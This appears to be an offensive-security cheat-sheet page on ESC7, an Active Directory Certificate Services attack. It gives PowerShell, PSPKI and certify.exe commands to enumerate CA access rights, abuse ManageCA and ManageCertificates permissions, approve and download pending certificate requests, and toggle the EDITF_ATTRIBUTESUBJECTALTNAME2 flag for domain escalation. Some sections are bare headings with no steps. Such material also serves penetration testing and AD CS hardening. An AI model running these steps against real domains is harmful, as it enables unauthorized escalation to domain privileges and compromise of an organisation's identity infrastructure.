Skip to main content

ESC7

Vulnerable Certificate Authority Access Control where 2 sets of permissions poses security risks:

  • ManageCA (or ManageCertificates)
  • ManageCertificates (or Certificate Manager)

Enumerate using certsrv.msc

PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.local | Get-CertificationAuthorityAcl | select -expand Access

Query CA with certutil (EditFlags value)

EDITF_ATTRIBUTESUBJECTALTNAME2 is set if the value is 1376590.

ManageCA

Templates with ManageCA enables the principal to manipulate settings remotely using PSPKI. This includes toggling the EDITF_ATTRIBUTESUBJECTALTNAME2 flag to permit SAN specification in any template, a critical aspect of domain escalation.

Windows

ManageCA rights to perform the ESC6 attack

ESC6 attack got patch on May of 2022. Note: this will not have any effect until the CA service (CertSvc) is restarted which ManageCA users have but they can't do it remotely.

Request Certificate Template
PS /home/bobbuilder> certify.exe request /ca:<ca> /template:ApprovalNeeded
Import PSPKI module
Import-Module PSPKI
Approve Pending Request
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.local | Get-PendingRequest -RequestID 336 | Approve-CertificateRequest
Download Pending Request
PS /home/bobbuilder> certify.exe download /ca:<ca> /id:336

Only ManageCA permission

Manage Certificates permission (can be granted from ManageCA)

Certificate template SubCA must be enabled (can be enabled from ManageCA)

Disable EDITF_ATTRIBUTESUBJECTALTNAME2 with PowerShell

$ConfigReader.SetConfigEntry(1114446,"EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy") $ConfigReader.GetConfigEntry("EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")